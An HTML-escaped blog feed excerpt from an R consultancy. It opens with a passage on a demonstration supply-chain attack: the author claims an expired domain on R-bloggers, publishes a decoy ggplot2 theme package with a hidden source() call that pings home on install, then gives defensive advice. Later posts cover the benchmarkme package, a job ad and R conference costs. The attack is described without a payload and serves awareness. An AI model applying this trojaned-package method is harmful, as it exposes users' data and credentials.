&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;head&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;pre tabindex="0"&gt;&lt;code&gt;# A tibble: 6 x 2
urls status_codes
&amp;lt;chr&amp;gt; &amp;lt;int&amp;gt;
1 http://www.56n.dk 406
2 http://bio7.org/ 403
3 http://www.seascapemodels.org/bluecology_blog/index.html 404
4 https://climateecology.wordpress.com 410
5 http://www.compmath.com/blog 500
6 https://hamiltonblake.github.io 404
&lt;/code&gt;&lt;/pre&gt;&lt;p&gt;In the end, we went with &lt;code&gt;vinux.in&lt;/code&gt;. Using the Wayback machine, this site seems to have died around 2017. The cost of claiming this site was £10 for the year.&lt;/p&gt;
&lt;p&gt;By claiming this site, I have automatically got a site that has incoming traffic. One evil strategy is simply to set back and get traffic from R-bloggers.&lt;/p&gt;
&lt;h3 id="blogdown--ggplot2-the-bait"&gt;{blogdown} &amp;amp; {ggplot2}: the bait&lt;/h3&gt;
&lt;p&gt;Next, I created a GitLab user &lt;code&gt;rstatsgit&lt;/code&gt; and a blog via the excellent {blogdown} package. Now clearly we need something to entice people to run our code, so I created a very simple R package the scans {ggplot2} themes. Nothing fancy, only a dozen lines of code or so. In case someone looked at the GitHub page, I just copied a few badges from other packages to make it look more genuine. I used netlify to link our new blog to our recently purchased domain. The &lt;a href="http://blog.vinux.in" rel="external"&gt;resulting blog&lt;/a&gt; doesn&amp;rsquo;t look too bad at all.&lt;/p&gt;
&lt;p&gt;At the &lt;a href="https://gitlab.com/rstatsgitlab/theme/blob/master/R/themes.R#L105" rel="external"&gt;bottom&lt;/a&gt; of one of the &lt;code&gt;.R&lt;/code&gt; files in the package, there is a simple &lt;code&gt;source()&lt;/code&gt; command. This, in theory, could be used to do anything - grab data, passwords, ssh keys. Clearly, we don&amp;rsquo;t do any of this. Instead, it simply pings a site to tell us if the package has been installed.&lt;/p&gt;
&lt;h3 id="r-bloggers--twitter-delivery"&gt;R-bloggers &amp;amp; twitter: Delivery&lt;/h3&gt;
&lt;p&gt;To deliver the content, I&amp;rsquo;m going for a combination of trying to get it onto r-bloggers via the old RSS feed and tweeting about the page with the &lt;code&gt;#rstats&lt;/code&gt; tag.&lt;/p&gt;
&lt;h3 id="did-people-install-the-package"&gt;Did people install the package&lt;/h3&gt;
&lt;p&gt;I&amp;rsquo;ll update the blog post with results in a week or two.&lt;/p&gt;
&lt;h3 id="who-is-not-to-blame"&gt;Who is &lt;strong&gt;not&lt;/strong&gt; to blame&lt;/h3&gt;
&lt;p&gt;It&amp;rsquo;s instructive to think about who is &lt;strong&gt;not&lt;/strong&gt; to blame:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Gitlab/GitHub: it would be impossible for them to police who code that is uploaded to their site.&lt;/li&gt;
&lt;li&gt;{devtools}(install_git*()): They&amp;rsquo;re many legitimate uses for this function. Blaming it would be the equivalent to blaming StackOverflow for bad advice. It doesn&amp;rsquo;t really make sense.&lt;/li&gt;
&lt;li&gt;R-bloggers: It simply isn&amp;rsquo;t feasible to thoroughly vet every post. In the past, the site has quickly reacted to anything spammy and removed offending articles. They also have no control&lt;/li&gt;
&lt;li&gt;The person who owned the site: Nope. They owned the site. Now they don&amp;rsquo;t. They have no responsibility.&lt;/li&gt;
&lt;/ul&gt;
&lt;h3 id="who-is-to-blame"&gt;Who is to blame?&lt;/h3&gt;
&lt;p&gt;Well, I suppose I&amp;rsquo;m to blame since I created the site and package ;) But more seriously if you installed the package, &lt;strong&gt;you&amp;rsquo;re&lt;/strong&gt; to blame! I think everyone is guilty of copying and pasting code from blogs, StackOverflow, forums and not always understanding what&amp;rsquo;s going on. But the internet is a dangerous place, and most people who us R, almost certainly have juicy data that shouldn&amp;rsquo;t be released to the outside world.&lt;/p&gt;
&lt;p&gt;By pure coincidence, I&amp;rsquo;ve noticed that &lt;a href="https://twitter.com/hrbrmstr" rel="external"&gt;Bob Rudis&lt;/a&gt; has started emphasising that we should be more responsible about what we install.&lt;/p&gt;
&lt;h3 id="how-to-protect-against-this"&gt;How to protect against this?&lt;/h3&gt;
&lt;p&gt;This is something we have been helping clients tackle over the last two years. On one hand, companies use R to run the latest algorithms and try cutting edge visualisation methods. On top of this, they employ bright and enthusiastic data scientists who enjoy what they do. If companies make things too restrictive, people will either find a way around the problem or simply leave.&lt;/p&gt;
&lt;p&gt;The crucial thing to remember is that if someone really wants to do something unsafe, we can&amp;rsquo;t stop them. Instead, we need to provide safe alternatives that don&amp;rsquo;t hinder work while at the same time reduce overall risk.&lt;/p&gt;
&lt;p&gt;When dealing with companies we help them tackle the problem in a number of ways&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Education! Both of the team and team leaders!&lt;/li&gt;
&lt;li&gt;Have an internal package repository. Either we build this, or use RStudio&amp;rsquo;s package manager &lt;a href="https://www.jumpingrivers.com/posit/" rel="external"&gt;we&amp;rsquo;re one of the few RStudio Certified partners&lt;/a&gt; in the world).&lt;/li&gt;
&lt;li&gt;We may disable tools such as &lt;code&gt;install_github()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Reduce risk by having clear testing and deployment machines&lt;/li&gt;
&lt;li&gt;Implement two-factor authentication&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;All of the above can be circumvented by a data scientist. But the idea is with education, we can reduce the potential risk while not impeding day to day work.&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-packages-security-install/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>{benchmarkme}: new version</title><link>https://www.jumpingrivers.com/blog/benchmarkme-new-version/</link><pubDate>Tue, 29 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/benchmarkme-new-version/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/benchmarkme-new-version/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/benchmarkme-new-version/original.png " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;When discussing how to speed up slow R code, my first question is what is your computer spec? It&amp;rsquo;s always surprised me that people are wondering why analysing big data is slow, yet they are using a five-year-old cheap laptop. Spending a few thousand pounds would often make their problems disappear. To quantify the impact of the CPU on analysis, I created the package {benchmarkme}. The aim of this package is to provide a set of benchmarks routines and data from past runs. You can then compare your machine, with other CPUs.&lt;/p&gt;
&lt;p&gt;The package is now on CRAN and can be installed in the usual way&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;# R 3.5.X only&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;install.packages&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;The &lt;code&gt;benchmark_std()&lt;/code&gt; function assesses numerical operations such as loops and matrix operations. This benchmark contains two main benchmarks&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;benchmark_std()&lt;/code&gt;: this benchmarks numerical operations such as loops and matrix operations. The benchmark comprises three separate benchmarks: &lt;code&gt;prog&lt;/code&gt;, &lt;code&gt;matrix_fun&lt;/code&gt;, and &lt;code&gt;matrix_cal&lt;/code&gt;.&lt;/li&gt;
&lt;li&gt;&lt;code&gt;benchmark_io()&lt;/code&gt;: this benchmarks reading and writing a 5 / 50, MB CSV file.&lt;/li&gt;
&lt;/ul&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-benchmarkme-new-version"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h3 id="the-benchmark_std-function"&gt;The benchmark_std() function&lt;/h3&gt;
&lt;p&gt;This benchmarks numerical operations such as loops and matrix operations. This benchmark comprises three separate benchmarks: &lt;code&gt;prog&lt;/code&gt;, &lt;code&gt;matrix_fun&lt;/code&gt;, and &lt;code&gt;matrix_cal&lt;/code&gt;.&lt;/p&gt;
&lt;p&gt;If you have less than 3GB of RAM (run &lt;code&gt;get_ram()&lt;/code&gt; to find out how much is available on your system), then you should kill any memory hungry applications, e.g. Firefox, and set &lt;code&gt;runs = 1&lt;/code&gt; as an argument.&lt;/p&gt;
&lt;p&gt;To benchmark your system, use&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;library&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkme&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## Increase runs if you have a higher spec machine&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_std&lt;/span&gt;(runs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;and upload your results&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#8b949e;font-style:italic"&gt;## You can control exactly what is uploaded. See details below.&lt;/span&gt;
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;upload_results&lt;/span&gt;(res)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can compare your results to other users via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(res)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;img class="image-center" src="featured.jpg" style="width:450px; class:image-center" alt="Benchmarkme results"&gt;
&lt;h3 id="the-benchmark_io-function"&gt;The benchmark_io() function&lt;/h3&gt;
&lt;p&gt;This function benchmarks reading and writing a 5MB or 50MB (if you have less than 4GB of RAM, reduce the number of &lt;code&gt;runs&lt;/code&gt; to 1). Run the benchmark using&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res_io &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_io&lt;/span&gt;(runs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;upload_results&lt;/span&gt;(res_io)
&lt;/span&gt;&lt;/span&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(res_io)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;By default, the files are written to a temporary directory generated&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;tempdir&lt;/span&gt;()
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;which depends on the value of&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;Sys.getenv&lt;/span&gt;(&lt;span style="color:#a5d6ff"&gt;&amp;#34;TMPDIR&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;You can alter this to via the &lt;code&gt;tmpdir&lt;/code&gt; argument. This is useful for comparing hard drive access to a network drive.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res_io &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_io&lt;/span&gt;(tmpdir &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;some_other_directory&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;As before, you can compare your results to previous results via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;plot&lt;/span&gt;(res_io)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h3 id="parallel-benchmarks"&gt;Parallel benchmarks&lt;/h3&gt;
&lt;p&gt;The benchmark functions above have a parallel option - just simply specify the number of cores you want to test. For example to test using four cores&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;res_io &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;benchmark_std&lt;/span&gt;(runs &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;3&lt;/span&gt;, cores &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;4&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="previous-versions-of-the-package"&gt;Previous versions of the package&lt;/h2&gt;
&lt;p&gt;This package was started around 2015. However, multiple changes in the byte compiler over the last few years has made it very difficult to use previous results. Essentially, the detecting if and how the byte compiler was being used became near on impossible. Also, R has just &amp;ldquo;got faster&amp;rdquo;, so it doesn&amp;rsquo;t make sense to compare benchmarks between different R versions. So we have to start from scratch (I did spend a few days trying to salvage something but to no avail).&lt;/p&gt;
&lt;p&gt;The previous data can be obtained via&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(past_results, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkmeData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;h2 id="machine-specs"&gt;Machine specs&lt;/h2&gt;
&lt;p&gt;The package has a few useful functions for extracting system specs:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;RAM: &lt;code&gt;get_ram()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;CPUs: &lt;code&gt;get_cpu()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;BLAS library: &lt;code&gt;get_linear_algebra()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;Is byte compiling enabled: &lt;code&gt;get_byte_compiler()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;General platform info: &lt;code&gt;get_platform_info()&lt;/code&gt;&lt;/li&gt;
&lt;li&gt;R version: &lt;code&gt;get_r_version()&lt;/code&gt;&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The above functions have been tested on a number of systems. If they don’t work on your system, please raise &lt;a href="https://github.com/csgillespie/benchmarkme/issues" rel="external"&gt;GitHub&lt;/a&gt; issue.&lt;/p&gt;
&lt;h2 id="uploaded-datasets"&gt;Uploaded datasets&lt;/h2&gt;
&lt;p&gt;A summary of the uploaded datasets is available in the &lt;a href="https://github.com/csgillespie/benchmarkme-data" rel="external"&gt;benchmarkmeData&lt;/a&gt; package&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;data&lt;/span&gt;(past_results_v2, package &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#a5d6ff"&gt;&amp;#34;benchmarkmeData&amp;#34;&lt;/span&gt;)
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;&lt;p&gt;A column of this data set contains the unique identifier returned by the &lt;code&gt;upload_results()&lt;/code&gt; function.&lt;/p&gt;
&lt;h2 id="whats-uploaded"&gt;What’s uploaded&lt;/h2&gt;
&lt;p&gt;Two objects are uploaded:&lt;/p&gt;
&lt;ol&gt;
&lt;li&gt;Your benchmarks from &lt;code&gt;benchmark_std&lt;/code&gt; or &lt;code&gt;benchmark_io&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;A summary of your system information (&lt;code&gt;get_sys_details()&lt;/code&gt;).&lt;/li&gt;
&lt;/ol&gt;
&lt;p&gt;The &lt;code&gt;get_sys_details()&lt;/code&gt; returns:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;&lt;code&gt;Sys.info()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_platform_info()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_r_version()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_ram()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_cpu()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_byte_compiler()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;get_linear_algebra()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;installed.packages()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;&lt;code&gt;Sys.getlocale()&lt;/code&gt;;&lt;/li&gt;
&lt;li&gt;The &lt;code&gt;benchmarkme&lt;/code&gt; version number;&lt;/li&gt;
&lt;li&gt;Unique ID - used to extract results;&lt;/li&gt;
&lt;li&gt;The current date.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;The function &lt;code&gt;Sys.info()&lt;/code&gt; does include the user and nodenames. In the public release of the data, this information will be removed. If you don’t wish to upload certain information, just set the corresponding argument, i.e.&lt;/p&gt;
&lt;div class="highlight"&gt;&lt;pre tabindex="0" style="color:#e6edf3;background-color:#0d1117;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"&gt;&lt;code class="language-r" data-lang="r"&gt;&lt;span style="display:flex;"&gt;&lt;span&gt;&lt;span style="color:#d2a8ff;font-weight:bold"&gt;upload_results&lt;/span&gt;(res, args &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#d2a8ff;font-weight:bold"&gt;list&lt;/span&gt;(sys_info &lt;span style="color:#ff7b72;font-weight:bold"&gt;=&lt;/span&gt; &lt;span style="color:#79c0ff"&gt;FALSE&lt;/span&gt;))
&lt;/span&gt;&lt;/span&gt;&lt;/code&gt;&lt;/pre&gt;&lt;/div&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/benchmarkme-new-version/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>We're Hiring: Data Scientist</title><link>https://www.jumpingrivers.com/blog/were-hiring-data-scientist/</link><pubDate>Mon, 28 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/were-hiring-data-scientist/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/were-hiring-data-scientist/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/were-hiring-data-scientist/original.jpg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;p&gt;Jumping Rivers is a data science company based in Newcastle. We are not sector based and our clients range through all industries. We are looking for individuals who enjoy a challenge.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Main Duties&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Technical Duties:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Provide technical training&lt;/li&gt;
&lt;li&gt;Development of bespoke statistical algorithms.&lt;/li&gt;
&lt;li&gt;Building web applications using R and Shiny.&lt;/li&gt;
&lt;li&gt;Data analysis using R and/or Python.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Client contact:&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attend on-site client meetings&lt;/li&gt;
&lt;li&gt;Off-site meetings via video conference call&lt;/li&gt;
&lt;li&gt;Training on site&lt;/li&gt;
&lt;li&gt;Develop a plan of action for consultancy.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Other duties&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Attending conferences, such as useR!&lt;/li&gt;
&lt;li&gt;Promote the company via Twitter, LinkedIn, StackOverflow and Kaggle.&lt;/li&gt;
&lt;li&gt;Write blog posts.&lt;/li&gt;
&lt;li&gt;Complete timesheets and reports for clients&lt;/li&gt;
&lt;li&gt;Manage your project board&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;Ability to travel to client sites (including international travel). The applicant will work from home. Applicants must have the right to work in the UK.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Experience&lt;/em&gt;&lt;/p&gt;
&lt;p&gt;Candidates should have a BSc (at least a 2.2) or equivalent in statistics, mathematics or relevant scientific discipline. They should have a working knowledge of programming.&lt;/p&gt;
&lt;p&gt;&lt;em&gt;Desirable (but not essential)&lt;/em&gt;&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Knowledge of statistical and/or machine learning algorithms&lt;/li&gt;
&lt;li&gt;Programming experience with R, Python, Matlab or Java&lt;/li&gt;
&lt;li&gt;Web experience.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;You should have the relevant permissions to work in the UK&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/were-hiring-data-scientist/"&gt;original post&lt;/a&gt;
&lt;/p&gt;</description></item><item><title>R Conference Costs v2.0</title><link>https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/</link><pubDate>Fri, 25 Jan 2019 23:59:00 +0000</pubDate><guid>https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/</guid><description>
&lt;p&gt;
&lt;a href = "https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/"&gt;
&lt;img src="https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/r-conference-costs.svg " width="400" style="width:400px" class="image-center" style="display: block; margin: auto;" /&gt;
&lt;/a&gt;
&lt;/p&gt;
&lt;h1 id="r-conference-costs"&gt;R conference Costs&lt;/h1&gt;
&lt;p&gt;Last year we gave you a price break down of some of the most popular R conferences around the globe for 2017. We’re going to do it again for 2018. Remember, you can get up-to-date information on upcoming conferences via our &lt;a href="https://jumpingrivers.github.io/meetingsR/" rel="external"&gt;GitHub&lt;/a&gt; page.&lt;/p&gt;
&lt;p&gt;It’s important to note that these costs are the prices of an industry ticket for the conference &lt;em&gt;only&lt;/em&gt;. If you caught the tickets on early bird and are an academic/student you could see these prices fall by over 50% in some cases. I’ll also mention extra pricing below.&lt;/p&gt;
&lt;table&gt;
&lt;thead&gt;
&lt;tr&gt;
&lt;th&gt;Conference&lt;/th&gt;
&lt;th&gt;Cost($)&lt;/th&gt;
&lt;th&gt;#Days&lt;/th&gt;
&lt;th&gt;Cost/Day&lt;/th&gt;
&lt;/tr&gt;
&lt;/thead&gt;
&lt;tbody&gt;
&lt;tr&gt;
&lt;td&gt;rstudio::conf 2019&lt;/td&gt;
&lt;td&gt;795&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;398&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;eRum 2018&lt;/td&gt;
&lt;td&gt;311&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;104&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;WhyR 2018&lt;/td&gt;
&lt;td&gt;170&lt;/td&gt;
&lt;td&gt;4&lt;/td&gt;
&lt;td&gt;42&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;Earl London 2018&lt;/td&gt;
&lt;td&gt;1170&lt;/td&gt;
&lt;td&gt;3&lt;/td&gt;
&lt;td&gt;390&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;satRday Amsterdam 2018&lt;/td&gt;
&lt;td&gt;45&lt;/td&gt;
&lt;td&gt;1&lt;/td&gt;
&lt;td&gt;45&lt;/td&gt;
&lt;/tr&gt;
&lt;tr&gt;
&lt;td&gt;New York R&lt;/td&gt;
&lt;td&gt;750&lt;/td&gt;
&lt;td&gt;2&lt;/td&gt;
&lt;td&gt;375&lt;/td&gt;
&lt;/tr&gt;
&lt;/tbody&gt;
&lt;/table&gt;
&lt;p&gt;Now, with add-ons it could have been a whole different story. For example, if you wanted to attend any of the 1 or 2-day workshops for rstudio::conf 2018 before the actual conference, you’re looking at adding an extra overall $995 - 1500. However, conferences like eRum and WhyR have no extra pricing.&lt;/p&gt;
&lt;img class="image-center" src="r-conference-costs.svg" style="width:550px; class:image-center"&gt;
&lt;aside class="advert"&gt;
&lt;p&gt;
Do you use Professional Posit Products? If so, check out our &lt;a href="https://www.jumpingrivers.com/consultancy/managed-rstudio-rsconnect-cloud-production/?utm_source=blog&amp;amp;utm_medium=banner&amp;amp;utm_campaign=2019-r-conference-costs-v2-0"&gt;managed Posit&lt;/a&gt; services
&lt;/p&gt;
&lt;/aside&gt;
&lt;h2 id="cost-but-what-about-"&gt;Cost, but what about &amp;hellip;&lt;/h2&gt;
&lt;p&gt;Clearly, the cost is only one of many factors used when deciding to attend a conference. Location, networking, date and speakers all play a part. In particular, we are planning on attending the &lt;code&gt;rstudio::conf&lt;/code&gt; in 2020, even though it&amp;rsquo;s one of the more expensive events (but it looks fantastic!). In fact, next year the conference is in San Francisco (Jan 27-30th, 2020). The first 100 ticket purchasers will get the special &lt;a href="https://web.cvent.com/event/36ebe042-0113-44f1-8e36-b9bc5d0733bf/summary" rel="external"&gt;price of $450!&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;
For updates and revisions to this article, see the &lt;a href = "https://www.jumpingrivers.com/blog/r-conference-costs-v2-0/"&gt;original post&lt;/a&gt;
